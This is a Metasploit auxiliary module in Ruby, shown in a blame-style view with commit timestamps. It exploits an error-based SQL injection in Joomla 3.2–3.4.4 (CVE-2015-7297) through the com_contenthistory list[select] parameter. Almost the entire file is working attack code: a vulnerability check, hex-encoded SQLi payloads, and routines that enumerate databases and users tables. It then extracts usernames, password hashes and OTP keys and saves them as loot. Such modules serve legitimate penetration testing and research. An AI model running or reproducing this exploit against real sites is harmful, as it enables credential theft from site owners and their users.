2015-10-22 20:05:02 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-07 08:57:22 +00:00
|
|
|
class Metasploit < Msf::Auxiliary
|
2015-10-22 20:05:02 +00:00
|
|
|
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Joomla com_contenthistory Error-Based SQL Injection',
|
|
|
|
'Description' => %q{
|
2015-10-25 03:56:36 +00:00
|
|
|
This module exploits a SQL injection vulnerability in Joomla versions 3.2
|
2015-10-25 16:01:17 +00:00
|
|
|
through 3.4.4 in order to either enumerate usernames and password hashes.
|
2015-10-22 20:05:02 +00:00
|
|
|
},
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2015-7297'],
|
|
|
|
['URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/']
|
|
|
|
],
|
|
|
|
'Author' =>
|
|
|
|
[
|
2015-10-25 03:56:36 +00:00
|
|
|
'Asaf Orpani', # discovery
|
2015-10-27 16:21:17 +00:00
|
|
|
'bperry', # metasploit module
|
|
|
|
'Nixawk' # module review
|
2015-10-22 20:05:02 +00:00
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
2015-10-25 03:56:36 +00:00
|
|
|
'DisclosureDate' => 'Oct 22 2015'
|
2015-10-22 20:05:02 +00:00
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2015-10-25 03:56:36 +00:00
|
|
|
OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
|
2015-10-22 20:05:02 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
flag = Rex::Text.rand_text_alpha(8)
|
2015-10-25 03:56:36 +00:00
|
|
|
lmark = Rex::Text.rand_text_alpha(5)
|
|
|
|
rmark = Rex::Text.rand_text_alpha(5)
|
2015-10-22 20:05:02 +00:00
|
|
|
|
2015-10-25 03:56:36 +00:00
|
|
|
payload = 'AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT('
|
|
|
|
payload << "0x#{lmark.unpack('H*')[0]},"
|
|
|
|
payload << "(SELECT 0x#{flag.unpack('H*')[0]}),"
|
|
|
|
payload << "0x#{rmark.unpack('H*')[0]},"
|
|
|
|
payload << 'FLOOR(RAND(0)*2)'
|
|
|
|
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
|
2015-10-22 20:05:02 +00:00
|
|
|
|
|
|
|
res = sqli(payload)
|
|
|
|
|
2015-10-25 03:56:36 +00:00
|
|
|
if res && res.code == 500 && res.body =~ /#{lmark}#{flag}#{rmark}/
|
|
|
|
Msf::Exploit::CheckCode::Vulnerable
|
2015-10-25 06:57:56 +00:00
|
|
|
else
|
|
|
|
Msf::Exploit::CheckCode::Safe
|
2015-10-22 20:05:02 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2015-10-26 22:13:51 +00:00
|
|
|
def request(query, payload, lmark, rmark)
|
|
|
|
query = "#{payload}" % query
|
2015-10-25 03:56:36 +00:00
|
|
|
res = sqli(query)
|
2015-10-22 20:05:02 +00:00
|
|
|
|
2015-10-25 03:56:36 +00:00
|
|
|
# Error based SQL Injection
|
2015-10-26 22:13:51 +00:00
|
|
|
if res && res.code == 500 && res.body =~ /#{lmark}(.*)#{rmark}/
|
2015-10-25 03:56:36 +00:00
|
|
|
$1
|
|
|
|
end
|
|
|
|
end
|
2015-10-23 14:32:15 +00:00
|
|
|
|
2015-10-26 22:13:51 +00:00
|
|
|
def query_databases(payload, lmark, rmark)
|
2015-10-23 14:32:15 +00:00
|
|
|
dbs = []
|
2015-10-25 03:56:36 +00:00
|
|
|
|
|
|
|
query = '(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) '
|
|
|
|
query << 'FROM INFORMATION_SCHEMA.SCHEMATA)'
|
|
|
|
|
2015-10-26 22:13:51 +00:00
|
|
|
dbc = request(query, payload, lmark, rmark)
|
2015-10-25 03:56:36 +00:00
|
|
|
|
|
|
|
query_fmt = '(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) '
|
|
|
|
query_fmt << 'FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1)'
|
|
|
|
|
|
|
|
0.upto(dbc.to_i - 1) do |i|
|
2015-10-26 22:13:51 +00:00
|
|
|
dbname = request(query_fmt % i, payload, lmark, rmark)
|
2015-10-25 03:56:36 +00:00
|
|
|
dbs << dbname
|
2015-10-25 06:57:56 +00:00
|
|
|
vprint_good(dbname)
|
2015-10-23 14:32:15 +00:00
|
|
|
end
|
2015-10-22 20:05:02 +00:00
|
|
|
|
2015-10-25 03:56:36 +00:00
|
|
|
%w(performance_schema information_schema mysql).each do |dbname|
|
|
|
|
dbs.delete(dbname) if dbs.include?(dbname)
|
|
|
|
end
|
2015-10-27 16:21:17 +00:00
|
|
|
|
2015-10-25 03:56:36 +00:00
|
|
|
dbs
|
|
|
|
end
|
2015-10-23 14:32:15 +00:00
|
|
|
|
2015-10-26 22:13:51 +00:00
|
|
|
def query_tables(database, payload, lmark, rmark)
|
2015-10-25 03:56:36 +00:00
|
|
|
tbs = []
|
2015-10-22 20:05:02 +00:00
|
|
|
|
2015-10-25 03:56:36 +00:00
|
|
|
query = '(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) '
|
|
|
|
query << 'FROM INFORMATION_SCHEMA.TABLES '
|
|
|
|
query << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}))"
|
|
|
|
|
2015-10-26 22:13:51 +00:00
|
|
|
tbc = request(query, payload, lmark, rmark)
|
2015-10-25 03:56:36 +00:00
|
|
|
|
|
|
|
query_fmt = '(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) '
|
|
|
|
query_fmt << 'FROM INFORMATION_SCHEMA.TABLES '
|
|
|
|
query_fmt << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}) "
|
|
|
|
query_fmt << 'LIMIT %d,1)'
|
|
|
|
|
2015-10-25 06:57:56 +00:00
|
|
|
vprint_status('tables in database: %s' % database)
|
2015-10-25 03:56:36 +00:00
|
|
|
0.upto(tbc.to_i - 1) do |i|
|
2015-10-26 22:13:51 +00:00
|
|
|
tbname = request(query_fmt % i, payload, lmark, rmark)
|
2015-10-25 06:57:56 +00:00
|
|
|
vprint_good(tbname)
|
2015-10-25 03:56:36 +00:00
|
|
|
tbs << tbname if tbname =~ /_users$/
|
|
|
|
end
|
2015-10-27 16:21:17 +00:00
|
|
|
|
2015-10-25 03:56:36 +00:00
|
|
|
tbs
|
|
|
|
end
|
|
|
|
|
2015-10-26 22:13:51 +00:00
|
|
|
def query_columns(database, table, payload, lmark, rmark)
|
2015-10-25 03:56:36 +00:00
|
|
|
cols = []
|
|
|
|
query = "(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{database}.#{table})"
|
|
|
|
|
2015-10-26 22:13:51 +00:00
|
|
|
colc = request(query, payload, lmark, rmark)
|
2015-10-25 06:57:56 +00:00
|
|
|
vprint_status(colc)
|
2015-10-25 03:56:36 +00:00
|
|
|
|
|
|
|
valid_cols = [ # joomla_users
|
|
|
|
'activation',
|
|
|
|
'block',
|
|
|
|
'email',
|
|
|
|
'id',
|
|
|
|
'lastResetTime',
|
|
|
|
'lastvisitDate',
|
|
|
|
'name',
|
|
|
|
'otep',
|
|
|
|
'otpKey',
|
|
|
|
'params',
|
|
|
|
'password',
|
|
|
|
'registerDate',
|
|
|
|
'requireReset',
|
|
|
|
'resetCount',
|
|
|
|
'sendEmail',
|
|
|
|
'username'
|
|
|
|
]
|
|
|
|
|
|
|
|
query_fmt = '(SELECT MID((IFNULL(CAST(%s AS CHAR),0x20)),%d,54) '
|
|
|
|
query_fmt << "FROM #{database}.#{table} ORDER BY id LIMIT %d,1)"
|
|
|
|
|
|
|
|
0.upto(colc.to_i - 1) do |i|
|
|
|
|
record = {}
|
|
|
|
valid_cols.each do |col|
|
|
|
|
l = 1
|
|
|
|
record[col] = ''
|
|
|
|
loop do
|
2015-10-26 22:13:51 +00:00
|
|
|
value = request(query_fmt % [col, l, i], payload, lmark, rmark)
|
2015-10-25 03:56:36 +00:00
|
|
|
break if value.blank?
|
|
|
|
record[col] << value
|
|
|
|
l += 54
|
2015-10-22 20:05:02 +00:00
|
|
|
end
|
|
|
|
end
|
2015-10-25 03:56:36 +00:00
|
|
|
cols << record
|
2015-10-25 06:57:56 +00:00
|
|
|
vprint_status(record.to_s)
|
2015-10-22 20:05:02 +00:00
|
|
|
end
|
2015-10-27 16:21:17 +00:00
|
|
|
|
2015-10-25 03:56:36 +00:00
|
|
|
cols
|
|
|
|
end
|
2015-10-23 14:32:15 +00:00
|
|
|
|
2015-10-25 03:56:36 +00:00
|
|
|
def run
|
2015-10-26 22:13:51 +00:00
|
|
|
lmark = Rex::Text.rand_text_alpha(5)
|
|
|
|
rmark = Rex::Text.rand_text_alpha(5)
|
2015-10-25 03:56:36 +00:00
|
|
|
|
2015-10-26 22:13:51 +00:00
|
|
|
payload = 'AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT('
|
|
|
|
payload << "0x#{lmark.unpack('H*')[0]},"
|
|
|
|
payload << '%s,'
|
|
|
|
payload << "0x#{rmark.unpack('H*')[0]},"
|
|
|
|
payload << 'FLOOR(RAND(0)*2)'
|
|
|
|
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
|
2015-10-25 03:56:36 +00:00
|
|
|
|
2015-10-26 22:13:51 +00:00
|
|
|
dbs = query_databases(payload, lmark, rmark)
|
2015-10-25 03:56:36 +00:00
|
|
|
dbs.each do |db|
|
2015-10-26 22:13:51 +00:00
|
|
|
tables = query_tables(db, payload, lmark, rmark)
|
2015-10-25 03:56:36 +00:00
|
|
|
tables.each do |table|
|
2015-10-26 22:13:51 +00:00
|
|
|
cols = query_columns(db, table, payload, lmark, rmark)
|
2015-10-25 03:56:36 +00:00
|
|
|
next if cols.blank?
|
|
|
|
path = store_loot(
|
|
|
|
'joomla.users',
|
|
|
|
'text/plain',
|
|
|
|
datastore['RHOST'],
|
|
|
|
cols.to_json,
|
|
|
|
'joomla.users')
|
|
|
|
print_good('Saved file to: ' + path)
|
|
|
|
end
|
|
|
|
end
|
2015-10-22 20:05:02 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def sqli(payload)
|
2015-10-27 16:21:17 +00:00
|
|
|
send_request_cgi(
|
2015-10-22 20:05:02 +00:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
|
|
|
'vars_get' => {
|
|
|
|
'option' => 'com_contenthistory',
|
|
|
|
'view' => 'history',
|
|
|
|
'list[ordering]' => '',
|
|
|
|
'item_id' => 1,
|
|
|
|
'type_id' => 1,
|
2015-10-25 03:56:36 +00:00
|
|
|
'list[select]' => '1 ' + payload
|
2015-10-22 20:05:02 +00:00
|
|
|
}
|
2015-10-27 16:21:17 +00:00
|
|
|
)
|
2015-10-22 20:05:02 +00:00
|
|
|
end
|
2015-10-27 16:21:17 +00:00
|
|
|
|
2015-10-22 20:05:02 +00:00
|
|
|
end
|